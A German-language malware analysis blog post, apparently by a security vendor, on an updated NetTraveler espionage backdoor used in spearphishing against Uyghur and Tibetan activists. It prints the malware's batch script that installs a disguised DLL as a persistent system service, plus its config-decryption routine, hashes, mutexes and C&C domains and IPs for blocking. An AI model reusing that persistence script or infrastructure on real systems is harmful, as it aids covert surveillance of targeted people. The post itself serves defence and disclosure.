Rundum-Erneuerung der NetTraveler APT zum 10-jährigen Jubiläum

Über NetTraveler haben wir bereits HIER und HIER berichtet.

Früher in diesem Jahr beobachteten wir eine Zunahme der Angriffe gegen uigurische und tibetanische Aktivisten und Unterstützer unter Verwendung einer aktualisierten Version der NetTraveler-Backdoor.

Hier ein Beispiel für eine zielgerichtete Spearphishing-E-Mail, die im März 2014 an uigurische Aktivisten gesendet wurde.

nettraveler_1

Die Mail enthält zwei Anhänge – eine nicht schädliche JPG-Datei und eine 373 KB große MS Word .DOC-Datei.

Dateiname "Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc"
MD5 b2385963d3afece16bd7478b4cf290ce
Größe 381,667 Bytes

Die .DOC-Datei, die in Wahrheit ein “Single File Web Page”-Container ist, auch bekannt als “Web Archive Datei”, scheint auf einem System erstellt worden zu sein, das MS-Office vereinfachtes Chinesisch verwendet.

Sie enthält ein Exploit für die Sicherheitslücke CVE-2012-0158, das von Kaspersky Lab-Produkten als Exploit.MSWord.CVE-2012-0158.db detektiert wird.

Wird dieses Exploit auf einer angreifbaren Version von MS-Office ausgeführt, transportiert es das Hauptmodul “net.exe” (von Kaspersky Lab-Produkten detektiert als Trojan-Dropper.Win32.Agent.lifr) auf das System, welches wiederum eine Reihe von anderen Dateien installiert. Das wichtigste C&C-Modul wird unter “%SystemRoot%system32Windowsupdataney.dll” abgelegt, (von Kaspersky als Trojan-Spy.Win32.TravNet.qfr detektiert).

Name WINDOWSUPDATANEY.DLL
MD5 c13c79ad874215cfec8d318468e3d116
Größe 37,888 Bytes

Es wird durch eine Windows Batch-Datei mit dem Namen “DOT.BAT” (von Kaspersky Lab-Produkten als Trojan.BAT.Tiny.b detektiert) als Service (unter der Bezeichnung “Windowsupdata”) registriert:

@echo off

@reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost" /v Windowsupdata /t REG_MULTI_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ImagePath /t REG_EXPAND_SZ /d %SystemRoot%System32svchost.exe -k Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v DisplayName /t REG_SZ /d Windowsupdata /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ObjectName /t REG_SZ /d LocalSystem /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v ErrorControl /t REG_DWORD /d 1 /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdata" /v Start /t REG_DWORD /d 2 /f
@reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWindowsupdataParameters" /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%system32Windowsupdataney.dll /f

Um sicher zu gehen, dass die Malware nicht mehrfach ausgeführt wird, verwendet sie den Mutex “SD_2013 Is Running!”, um die Anwesenheit im System zu markieren. In älteren und aktuellen Varianten wurden unter anderem die folgenden Mutexes verwendet:

  • Boat-12 Is Running!
  • DocHunter2012 Is Running!
  • Hunter-2012 Is Running!
  • NT-2012 Is Running!
  • NetTravler Is Running!
  • NetTravler2012 Is Running!
  • SH-2011 Is Running!
  • ShengHai Is Running!
  • SD2013 is Running!

Die Konfigurationsdatei der Malware ist in den “SYSTEM”-Ordner geschrieben (anstatt in den Ordner SYSTEM32) und hat gegenüber den „älteren“ NetTraveler-Samples ein leicht verändertes Format:

nettraveler_2

Für die Akten: So sieht eine ältere Konfigurationsdatei von NetTraveler aus:

nettraveler_3

Offensichtlich haben die Entwickler von NetTraveler Maßnahmen ergriffen, in dem Versuch, die Konfiguration der Malware zu verbergen. Glücklicherweise lässt sich die Verschlüsselung recht leicht knacken.

Der Algorithmus sieht folgendermaßen aus:

for (i=0;i<string_size;i++)
decrypted[i]=encrypted[i] – (i + 0xa);

Entschlüsselt erhalten wir die folgende neue Konfigurationsdatei:

nettraveler_4

Problemlos kann man den Command-und-Control-Server (C&C) mit der Adresse “uyghurinfo[.]com” in dem oben stehenden Screenshot herauslesen.

Wir haben mehrere Samples identifiziert, die dieses neue Verschlüsselungsschema benutzen. Es folgt eine Liste aller erkannten C&C-Server:

C&C-Server IP IP-Standort Registrar
ssdcru.com 103.30.7.77 Hong Kong, Albert Heng, Trillion Company SHANGHAI MEICHENG TECHNOLOGY
uygurinfo.com 216.83.32.29 United States, Los Angeles, Integen Inc TODAYNIC.COM
INC.
samedone.com 122.10.17.130 Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp Datacenter SHANGHAI MEICHENG TECHNOLOGY
gobackto.net 103.1.42.1 Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY
worksware.net N/A N/A SHANGHAI MEICHENG TECHNOLOGY
jojomic.com was
202.146.219.14
Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY
angellost.net was 103.17.117.201 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY
husden.com was 103.30.7.76 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY

Wir empfehlen, alle diese Hosts in der Firewall zu blockieren.

Fazit

In diesem Jahr begehen die Cyberkriminellen, die hinter NetTraveler stehen, ihr 10jähriges „Dienst-Jubiläum“. Obgleich es so aussieht, als wären die frühsten Samples, die uns bekannt sind, im Jahr 2005 kompiliert, gibt es untrügliche Anzeichen dafür, dass die Aktivität der NetTraveler-Verbrecher bereits im Jahr 2004 ihren Anfang nahm.

nettraveler_5

Zehn Jahre lang hat NetTraveler verschiedene Sektoren angegriffen, wobei der Fokus auf Zielen in den Bereichen Diplomatie, Regierung und Militär lag.

nettraveler_6
NetTraveler-Opfer nach Branchen

In letzter Zeit dreht sich das Hauptinteresse der Cyberspionage-Aktivtät um Weltraumforschung, Nano-Technologie, Energieproduktion, Nuklearenergie, Laser, Medizin und Kommunikation.

Die Angriffe auf uigurische und tibetische Aktivisten sind eine Standardkomponente der NetTraveler-Aktivität, und wir gehen davon aus, dass sich das auch in den kommenden 10 Jahren nicht ändern wird.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.